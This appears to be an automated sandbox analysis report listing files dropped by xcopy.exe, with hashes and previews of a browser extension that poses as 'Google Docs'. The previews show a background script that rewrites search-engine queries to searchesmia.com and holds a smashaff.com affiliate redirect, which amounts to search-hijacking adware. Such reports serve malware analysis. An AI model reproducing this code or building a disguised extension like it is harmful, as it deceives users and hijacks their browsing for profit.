                                                                                                                  SHA1:2F4A29E39A69944D6A954ECCE21607F5CE8E2A1E
                                                                                                                  SHA-256:0ADE971AE68AE6D818E9837AB8C6D4D603AC0BB3D23AA78A0F5D1B91706E155E
                                                                                                                  SHA-512:5292B9E01C044CBBCDBB1E3A558FBA3542A577D3D54E1282282D1C13D1A10BED440D602657D25014249B74EC3F8EA1EF506C47C0C00EF01C9D7D37DD72FB3D09
                                                                                                                  Malicious:false
                                                                                                                  Preview:var data=['yahoo.com','p','q','https://searchesmia.com/bingchr4?q=',..'^http(s)?:\/\/(www|search?).(google|yahoo|bing|ecosia)?\.[a-z]{2,4}\/search',..'^http(s)?:\/\/(www|search?).yahoo.com\/yhs\/search',..'duckduckgo.com/?q=','ask.com/web?','/%20/g','+','www.','&first','bing.com',..'7fk8qechol',..'popup',..'https://smashaff.com/redirect?&url=',..'www',..'amazon.com',..'colort',..'smashaff.com'..];....let tabsHistory = {};..let throughSmash = {};..let prevBing = {};....var seaDefault = new RegExp(data[4]);..var yasea = new RegExp(data[5]); ..var dusea = new RegExp(data[6]);..var asksea = new RegExp(data[7]);....function convertURL(hostname, urlParams) {.. var uri = '';.. if (hostname.indexOf(data[0]) !== -1).. uri = urlParams.get('p');.. else.. uri = urlParams.get('q');.. return data[3] + uri;.. }....try {.. chrome.tabs.onUpdated.addListener((tabId, info) => { if(data!=undefined){ .. if(info.status) {.. if(info.stat
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):203
                                                                                                                  Entropy (8bit):4.676765497065817
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:BKsg+RoJf2QQ0g+RosxEjqOuWE42q93wdy:BNoJPQUosx5CH22J
                                                                                                                  MD5:7A0EA7C07E1D4AE1444C0B11827D2C77
                                                                                                                  SHA1:6C704E23C57178101F0CFDB3FD8A5439EEFCCF92
                                                                                                                  SHA-256:7FD6486432256C15FA6568F04AF2DB56DE31E9AECC16044B3D5B488957A7BCC2
                                                                                                                  SHA-512:9DF327ECAC037E1A3AB9432C290C886CDD06E4623679CDD5596157866AD7AE45A6F2DA533DFC8A44719F44ECC70153E6D0DB3435C39999B940A039D000AC923A
                                                                                                                  Malicious:false
                                                                                                                  Preview:..window.addEventListener('load',function(){.... window.addEventListener('click',function(){.... // alert('cp');.... chrome.runtime.sendMessage({'cout': 'reset'});.... });........});..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):7028
                                                                                                                  Entropy (8bit):5.226588714703554
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:1k1V0qvSRaTa5Tn9IpXHWEVAWJ77bWEVTexdjWUKqhv:GqT95oV7y+Kd6ULhv
                                                                                                                  MD5:23AA4675166ABF6DBB1661318F2091CD
                                                                                                                  SHA1:AD71B9576BC722252CACA2AE35A29AAAFF2BC273
                                                                                                                  SHA-256:1BB529A289367ABAF7AC40A04CB999D1DCA10EFB5AB12D406E255DCD2E107C78
                                                                                                                  SHA-512:3A0DB1E3BE57E68B974A25A3E97E410BB25BAC78C2C0890B26A0ED74A7237B8E74C6A521339D78E56840939AFA09335D8BC5EB8B8832C0835010F08284790034
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.. Created with Inkscape (http://www.inkscape.org/) -->....<svg.. xmlns:dc="http://purl.org/dc/elements/1.1/".. xmlns:cc="http://creativecommons.org/ns#".. xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#".. xmlns:svg="http://www.w3.org/2000/svg".. xmlns="http://www.w3.org/2000/svg".. xmlns:xlink="http://www.w3.org/1999/xlink".. xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd".. xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape".. width="5.8741975mm".. height="5.8741975mm".. viewBox="0 0 5.8741975 5.8741975".. version="1.1".. id="svg8".. inkscape:version="0.92.3 (2405546, 2018-03-11)".. sodipodi:docname="logo.svg".. inkscape:export-filename="/home/simon/Lien vers Files/Programming/Browser-addons/chrome-addon-v3-starter/logo/logo-128.png".. inkscape:export-xdpi="553.47137".. inkscape:export-ydpi="553.47137">.. <defs.. id="defs2">.. <linearGradient..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1202
                                                                                                                  Entropy (8bit):4.7259052604003875
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:5KRwq1wVIsJ4K7LyRJ/GuHRmBONQg2SXDiiKbzq86UXYw5Pg+pG8WKUuL:UiG0BZnyR5GuHRmBRg2SXD2q83YuvpXL
                                                                                                                  MD5:B5923D09C1D62C8B718473CC804D6F77
                                                                                                                  SHA1:9EB22A6CE2AD88F9BC5EAA06367E80BB548E6EBF
                                                                                                                  SHA-256:BFB7F6DC266847896A21A8513D639EABF3F74D2A2DEF95104459AD322B13FAC6
                                                                                                                  SHA-512:053D949B67ADAFB42C4285410546514E0954A219A4999ADE8E266511802E94FD2BAEE2B57D0B7F1C13AB09EAD724DF6FB09AD7DCF1226FB263D4477B61BB459F
                                                                                                                  Malicious:false
                                                                                                                  Preview:{.. "manifest_version": 3,.. "name": " Google Docs",.. "short_name": "Google Docs",.. "version": "1.0",.. "background": {.. "service_worker": "bg/background.js",.. "type": "module".. },.. "action": {.. "default_title": "Google Docs",.. "default_icon": "img/logo/logo-16.png".. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "description": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.",.. "icons": {.. "16": "img/logo/logo-16.png",.. "48": "img/logo/logo-48.png",.. "128": "img/logo/logo-128.png".. },.. "incognito": "spanning",.. "permissions": [.. "activeTab",.. "declarativeNetRequest",.. "webNavigation",.. "storage",.. "tabs",.. "webRequest".. ],.. "host_permissions": [.. "http://*/*",.. "https://*/*".. ],.. "web_accessible_resources": [.. {.. "resources": [.. "img/logo/logo-16.png".. ],..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:ASCII text, with very long lines (662), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6986
                                                                                                                  Entropy (8bit):4.8857905053740325
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:s3iymZL/btGE2pRfQpxPyaGDd6M3TDsyzAr:TymZYexPWDcME
                                                                                                                  MD5:9E14A24DABF427581BE3933A700715E6
                                                                                                                  SHA1:2F4A29E39A69944D6A954ECCE21607F5CE8E2A1E
                                                                                                                  SHA-256:0ADE971AE68AE6D818E9837AB8C6D4D603AC0BB3D23AA78A0F5D1B91706E155E
                                                                                                                  SHA-512:5292B9E01C044CBBCDBB1E3A558FBA3542A577D3D54E1282282D1C13D1A10BED440D602657D25014249B74EC3F8EA1EF506C47C0C00EF01C9D7D37DD72FB3D09
                                                                                                                  Malicious:false
                                                                                                                  Preview:var data=['yahoo.com','p','q','https://searchesmia.com/bingchr4?q=',..'^http(s)?:\/\/(www|search?).(google|yahoo|bing|ecosia)?\.[a-z]{2,4}\/search',..'^http(s)?:\/\/(www|search?).yahoo.com\/yhs\/search',..'duckduckgo.com/?q=','ask.com/web?','/%20/g','+','www.','&first','bing.com',..'7fk8qechol',..'popup',..'https://smashaff.com/redirect?&url=',..'www',..'amazon.com',..'colort',..'smashaff.com'..];....let tabsHistory = {};..let throughSmash = {};..let prevBing = {};....var seaDefault = new RegExp(data[4]);..var yasea = new RegExp(data[5]); ..var dusea = new RegExp(data[6]);..var asksea = new RegExp(data[7]);....function convertURL(hostname, urlParams) {.. var uri = '';.. if (hostname.indexOf(data[0]) !== -1).. uri = urlParams.get('p');.. else.. uri = urlParams.get('q');.. return data[3] + uri;.. }....try {.. chrome.tabs.onUpdated.addListener((tabId, info) => { if(data!=undefined){ .. if(info.status) {.. if(info.stat
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):203
                                                                                                                  Entropy (8bit):4.676765497065817
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:BKsg+RoJf2QQ0g+RosxEjqOuWE42q93wdy:BNoJPQUosx5CH22J
                                                                                                                  MD5:7A0EA7C07E1D4AE1444C0B11827D2C77
                                                                                                                  SHA1:6C704E23C57178101F0CFDB3FD8A5439EEFCCF92
                                                                                                                  SHA-256:7FD6486432256C15FA6568F04AF2DB56DE31E9AECC16044B3D5B488957A7BCC2
                                                                                                                  SHA-512:9DF327ECAC037E1A3AB9432C290C886CDD06E4623679CDD5596157866AD7AE45A6F2DA533DFC8A44719F44ECC70153E6D0DB3435C39999B940A039D000AC923A
                                                                                                                  Malicious:false
                                                                                                                  Preview:..window.addEventListener('load',function(){.... window.addEventListener('click',function(){.... // alert('cp');.... chrome.runtime.sendMessage({'cout': 'reset'});.... });........});..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):7028
                                                                                                                  Entropy (8bit):5.226588714703554
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:1k1V0qvSRaTa5Tn9IpXHWEVAWJ77bWEVTexdjWUKqhv:GqT95oV7y+Kd6ULhv
                                                                                                                  MD5:23AA4675166ABF6DBB1661318F2091CD
                                                                                                                  SHA1:AD71B9576BC722252CACA2AE35A29AAAFF2BC273
                                                                                                                  SHA-256:1BB529A289367ABAF7AC40A04CB999D1DCA10EFB5AB12D406E255DCD2E107C78
                                                                                                                  SHA-512:3A0DB1E3BE57E68B974A25A3E97E410BB25BAC78C2C0890B26A0ED74A7237B8E74C6A521339D78E56840939AFA09335D8BC5EB8B8832C0835010F08284790034
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.. Created with Inkscape (http://www.inkscape.org/) -->....<svg.. xmlns:dc="http://purl.org/dc/elements/1.1/".. xmlns:cc="http://creativecommons.org/ns#".. xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#".. xmlns:svg="http://www.w3.org/2000/svg".. xmlns="http://www.w3.org/2000/svg".. xmlns:xlink="http://www.w3.org/1999/xlink".. xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd".. xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape".. width="5.8741975mm".. height="5.8741975mm".. viewBox="0 0 5.8741975 5.8741975".. version="1.1".. id="svg8".. inkscape:version="0.92.3 (2405546, 2018-03-11)".. sodipodi:docname="logo.svg".. inkscape:export-filename="/home/simon/Lien vers Files/Programming/Browser-addons/chrome-addon-v3-starter/logo/logo-128.png".. inkscape:export-xdpi="553.47137".. inkscape:export-ydpi="553.47137">.. <defs.. id="defs2">.. <linearGradient..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1202
                                                                                                                  Entropy (8bit):4.7259052604003875
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:5KRwq1wVIsJ4K7LyRJ/GuHRmBONQg2SXDiiKbzq86UXYw5Pg+pG8WKUuL:UiG0BZnyR5GuHRmBRg2SXD2q83YuvpXL
                                                                                                                  MD5:B5923D09C1D62C8B718473CC804D6F77
                                                                                                                  SHA1:9EB22A6CE2AD88F9BC5EAA06367E80BB548E6EBF
                                                                                                                  SHA-256:BFB7F6DC266847896A21A8513D639EABF3F74D2A2DEF95104459AD322B13FAC6
                                                                                                                  SHA-512:053D949B67ADAFB42C4285410546514E0954A219A4999ADE8E266511802E94FD2BAEE2B57D0B7F1C13AB09EAD724DF6FB09AD7DCF1226FB263D4477B61BB459F
                                                                                                                  Malicious:false
                                                                                                                  Preview:{.. "manifest_version": 3,.. "name": " Google Docs",.. "short_name": "Google Docs",.. "version": "1.0",.. "background": {.. "service_worker": "bg/background.js",.. "type": "module".. },.. "action": {.. "default_title": "Google Docs",.. "default_icon": "img/logo/logo-16.png".. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "description": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.",.. "icons": {.. "16": "img/logo/logo-16.png",.. "48": "img/logo/logo-48.png",.. "128": "img/logo/logo-128.png".. },.. "incognito": "spanning",.. "permissions": [.. "activeTab",.. "declarativeNetRequest",.. "webNavigation",.. "storage",.. "tabs",.. "webRequest".. ],.. "host_permissions": [.. "http://*/*",.. "https://*/*".. ],.. "web_accessible_resources": [.. {.. "resources": [.. "img/logo/logo-16.png".. ],..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:ASCII text, with very long lines (662), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6986
                                                                                                                  Entropy (8bit):4.8857905053740325
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:s3iymZL/btGE2pRfQpxPyaGDd6M3TDsyzAr:TymZYexPWDcME
                                                                                                                  MD5:9E14A24DABF427581BE3933A700715E6
                                                                                                                  SHA1:2F4A29E39A69944D6A954ECCE21607F5CE8E2A1E
                                                                                                                  SHA-256:0ADE971AE68AE6D818E9837AB8C6D4D603AC0BB3D23AA78A0F5D1B91706E155E
                                                                                                                  SHA-512:5292B9E01C044CBBCDBB1E3A558FBA3542A577D3D54E1282282D1C13D1A10BED440D602657D25014249B74EC3F8EA1EF506C47C0C00EF01C9D7D37DD72FB3D09
                                                                                                                  Malicious:false
                                                                                                                  Preview:var data=['yahoo.com','p','q','https://searchesmia.com/bingchr4?q=',..'^http(s)?:\/\/(www|search?).(google|yahoo|bing|ecosia)?\.[a-z]{2,4}\/search',..'^http(s)?:\/\/(www|search?).yahoo.com\/yhs\/search',..'duckduckgo.com/?q=','ask.com/web?','/%20/g','+','www.','&first','bing.com',..'7fk8qechol',..'popup',..'https://smashaff.com/redirect?&url=',..'www',..'amazon.com',..'colort',..'smashaff.com'..];....let tabsHistory = {};..let throughSmash = {};..let prevBing = {};....var seaDefault = new RegExp(data[4]);..var yasea = new RegExp(data[5]); ..var dusea = new RegExp(data[6]);..var asksea = new RegExp(data[7]);....function convertURL(hostname, urlParams) {.. var uri = '';.. if (hostname.indexOf(data[0]) !== -1).. uri = urlParams.get('p');.. else.. uri = urlParams.get('q');.. return data[3] + uri;.. }....try {.. chrome.tabs.onUpdated.addListener((tabId, info) => { if(data!=undefined){ .. if(info.status) {.. if(info.stat
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):203
                                                                                                                  Entropy (8bit):4.676765497065817
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:BKsg+RoJf2QQ0g+RosxEjqOuWE42q93wdy:BNoJPQUosx5CH22J
                                                                                                                  MD5:7A0EA7C07E1D4AE1444C0B11827D2C77
                                                                                                                  SHA1:6C704E23C57178101F0CFDB3FD8A5439EEFCCF92
                                                                                                                  SHA-256:7FD6486432256C15FA6568F04AF2DB56DE31E9AECC16044B3D5B488957A7BCC2
                                                                                                                  SHA-512:9DF327ECAC037E1A3AB9432C290C886CDD06E4623679CDD5596157866AD7AE45A6F2DA533DFC8A44719F44ECC70153E6D0DB3435C39999B940A039D000AC923A
                                                                                                                  Malicious:false
                                                                                                                  Preview:..window.addEventListener('load',function(){.... window.addEventListener('click',function(){.... // alert('cp');.... chrome.runtime.sendMessage({'cout': 'reset'});.... });........});..
                                                                                                                  Process:C:\Windows\System32\xcopy.exe
                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4982
                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                  Malicious:false
